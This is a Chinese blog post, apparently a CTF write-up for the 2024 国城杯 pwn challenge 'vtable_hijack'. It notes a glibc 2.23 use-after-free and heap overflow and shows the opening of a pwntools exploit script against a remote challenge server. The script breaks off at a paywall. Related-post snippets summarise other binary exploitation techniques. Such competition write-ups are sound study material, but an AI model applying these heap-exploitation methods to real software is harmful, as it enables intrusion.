2024 国城杯pwn 复现

原创 已于 2024-12-10 21:12:34 修改 · 586 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2024-12-10 20:42:39 首次发布

vtable_hijack

没有去符号表好评

2.23的uaf edit可以直接堆溢出,感觉什么洞都可以打

from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
p=remote('125.70.243.22',31194)
#p=process('./pwn')
elf=ELF('./pwn')


s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg = lambda s, num: log.success(f"{
     
     s} >>> {
     
     hex(num)}")

def add(idx,size):
    sla(b'choice:',b'1')
    sla(b'index:',str(idx))
    sla(b'size:',str(size))

def free(idx):
    sla(b'choice:',b'2')
    sla(b'index:',str(idx))

def edit(idx,size
最低0.47元/天 解锁文章
-yfy-
关注
羊城比赛pwn复现
yufeiyu66的博客
09-06 692
pwn 比赛复现
羊城2024 pwn4(kernel >= 5.6)
2301_79327647的博客
08-29 761
军训期间写题目实在是难崩,感觉能出的pwn4结果实在是没时间去搞(也有可能是我太菜了),赛后还被负责本次出题的学长贺师傅教育了一下,多练多练。个人感觉题目还行,虽然版本高一些,但是漏洞也很致命,只是magic_gradget不太好找了,没办法,好用的gadget是基于汇编上的,很容易就被修复,回顾我学的house系列,例如等中rdx都是编译级别的利用方式,可以很容易被修复,或者编译器发生变化也可能不再能使用。高版本的glibc真的难啊。
国城pwn
2302_79813730的博客
12-11 230
存在属于数组越界,可以输入负数,got表可打,先修改exit为main,后续计算偏移泄露libc地址,最后攻击printf的为system,返回后门获取shell。可见字符shellcode,并且开启沙盒,用openat+sendlife的shellcode,并用ae64转为可见字符。格式化字符串漏洞,线程题,并且给出libc地址,后续栈溢出直接打system的rop链。2.23,uaf+堆溢出,攻击malloc_hook。
2024最新版网络安全面试题精讲—万字详解黑客技术和网络安全经典题目,小白学习网络安全看这一篇就够了!
qq_41314882的博客
11-11 1190
首先,要了解到,大多数的漏洞扫描器的原理基本一样,除金融和其它特殊行业一些扫描器,比较智能,可以借助AI等辅助探测逻辑漏洞,其它基本基于指纹识别,网站架构等去匹配,然后调用POC库去进行漏洞扫描,当然也有高并发所有POC扫描的,这也弊端就是容易将业务扫崩像我用过的扫描器:启明星辰漏扫(WEB+主机),绿盟漏扫,安恒漏扫等,个人感觉各有千秋,厂商之间的扫描漏洞一部分来自于CNVD、CNNVD、CVE等,一部分来着自家挖掘,最后就是自家SRC漏洞平台合集首先,考虑这个问题比较基础,大概就是是否具备漏扫技能。
CTF国赛2023 - ukfc(四道逆向已下班)
qq_59700927的博客
05-28 2844
小明拿到了内网一个老旧服务的应用包,虽然有漏洞但是怎么利用他呢?这个函数中,%s读取字节无上限,导致缓冲区可以溢出到返回地址,由此我们着重进入这个函数并执行rop链。没有负数检查,直接减掉10*v9,那我们可以减掉一个大负数使得money大于100000。可以确定的是最后三位地址一定不会发生变化,那只需要对第四位爆破0xf位地址即可。有canary,原题:优快云 Canary学习(爆破Canary)程序是有pie的,我们直接修改下两位地址即可。先传入L文件,在传入R文件,然后。其中有flag,找到即可。
CTF夺旗赛:揭秘网络攻防技术战场,零基础入门到精通,收藏这一篇就够了
小司机的奥拓
02-22 1063
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
关于学科竞赛的经验
Teemos的博客
12-18 6975
莫西莫西,我系提莫莫队长,平时喜欢种种蘑菇。 起因是思梦姐姐找到我,希望给20级的同志分享下学科竞赛相关的经验,于是乎我答应了,于是乎又有了新的故事。 emmm,我在线下已经和部分师弟师妹们分享过了,在这里以文字的形式将分享的内容分享出来,方便师弟师妹们学习。
优快云博客专家证书发放名单(已暂停)
热门推荐
优快云 官方博客
07-12 6万+
博客专家专属奖励。
【2025】CTF入门教程(超详细)从零基础入门到竞赛,看这一篇就够了!_长亭 ctf w
程序员若风的博客
08-04 941
CTF(Capture The Flag)是一种网络安全技术竞赛,起源于1996年DEFCON黑客大会,现已成为全球流行的安全竞技赛事。比赛形式包括解题模式(Jeopardy)、攻防模式(Attack-Defense)和混合模式(Mix),涵盖Web渗透、逆向工程、密码学、漏洞挖掘等多个领域。国际知名赛事如DEFCON CTF(被誉为"世界"),国内则有XCTF联赛、AliCTF等。CTF不仅考验选手的技术能力,也促进网络安全人才的培养和交流,是安全领域的重要竞技平台。
网安竞赛年年有,今年你还在吗? ——CTF 的旋转门,转走了多少“热爱安全”的人
攻防SRC
05-06 1202
CTF原是技术的试炼场,如今成了投标素材库、PPT成果源、厂商背书场。你打的是比赛,他们跑的是流程;你熬夜写exp,他们挂墙立功勋。技术只是过场,KPI才是主角。你以为在冲榜,其实只是下一轮资源倾斜的可替换零件。
Web安全 网络安全_学习路线发展方向(表格一目了然)如何成为一名黑客Hacker?
刘鑫磊
08-24 784
网络安全学习路线发展方向
题目源码2024年强网全国网络安全挑战赛 PWN题目baby-heap源码
11-07
2024年强网全国网络安全挑战赛是针对网络安全爱好者的一次盛会,尤其是PWN题目,这类题目往往要求参赛者利用软件中的漏洞,获取或提升权限。本次提供的“baby-heap”源码,很可能是一个针对堆内存管理的漏洞利用...
2024网鼎 PWN02
c7777127_的博客
11-10 477
然后gift后门 运行binsh。buf偏移量为0x50。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8823
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
五次多项式换道转向避撞轨迹规划可视化Matlab代码(分析不同车速与路面附着系数对换道时间、距离及横向加速度的影响)
11-27
五次多项式换道转向避撞轨迹规划可视化Matlab代码(分析不同车速与路面附着系数对换道时间、距离及横向加速度的影响)内容概要:本文介绍了一套基于五次多项式插值的换道转向避撞轨迹规划方法,并提供了完整的Matlab可视化代码实现。该方法用于自动驾驶或智能车辆在紧急避障场景下的平滑轨迹生成,重点分析了不同初始车速与路面附着系数对换道过程的影响,包括换道所需时间、行驶距离及横向加速度的变化规律,从而评估轨迹的安全性与舒适性。文中通过仿真展示了在多种工况下轨迹的动态特性,帮助理解车辆动力学约束与路面条件对路径规划的影响。; 适合人群:具备一定车辆动力学基础和Matlab编程能力的研究生、科研人员及从事自动驾驶路径规划的工程技术人员。; 使用场景及目标:①研究自动驾驶车辆在避障换道过程中的轨迹生成与优化;②分析车速与路面摩擦系数对换道性能(如时间、距离、横向加速度)的影响;③为智能驾驶系统提供可验证的轨迹规划算法原型与仿真平台; 阅读建议:建议结合Matlab代码逐段运行并调整参数(如车速、附着系数),观察仿真结果变化,深入理解五次多项式在横向轨迹规划中的应用优势与局限,同时可扩展至更复杂的动态环境或多车协同场景。
中国移动数据分类分级及重要数据管控指导意见(1).docx
11-27
中国移动数据分类分级及重要数据管控指导意见(1)
基于数据驱动的 Koopman 算子的递归神经网络模型线性化,用于纳米定位系统的预测控制研究(Matlab代码实现)
最新发布
11-27
基于数据驱动的 Koopman 算子的递归神经网络模型线性化,用于纳米定位系统的预测控制研究(Matlab代码实现)内容概要:本文围绕“基于数据驱动的Koopman算子的递归神经网络模型线性化”展开,旨在研究纳米定位系统的预测控制方法。通过结合数据驱动技术与Koopman算子理论,将非线性系统动态近似为高维线性系统,进而利用递归神经网络(RNN)建模并实现系统行为的精确预测。文中详细阐述了模型构建流程、线性化策略及在预测控制中的集成应用,并提供了完整的Matlab代码实现,便于科研人员复现实验、优化算法并拓展至其他精密控制系统。该方法有效提升了纳米级定位系统的控制精度与动态响应性能。; 适合人群:具备自动控制、机器学习或信号处理背景,熟悉Matlab编程,从事精密仪器控制、智能制造或先进控制算法研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①实现非线性动态系统的数据驱动线性化建模;②提升纳米定位平台的轨迹跟踪与预测控制性能;③为高精度控制系统提供可复现的Koopman-RNN融合解决方案; 阅读建议:建议结合Matlab代码逐段理解算法实现细节,重点关注Koopman观测矩阵构造、RNN训练流程与模型预测控制器(MPC)的集成方式,鼓励在实际硬件平台上验证并调整参数以适应具体应用场景。
鄱阳湖水系.zip
11-27
水系流域矢量数据,坐标系wgs84,是流域范围,数据格式shp格式
基于STM32的宠物定位系统
11-27
基于STM32的宠物定位系统
2024春秋冬季pwn
02-18
### 2024春秋冬季PWN比赛详情及参赛指南 #### 比赛概述 2024春秋网络安全联赛冬季赛中的PWN类别挑战旨在测试选手在二进制漏洞挖掘与利用方面的能力。这类竞赛通常涉及对存在安全缺陷的程序进行分析、调试以及...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值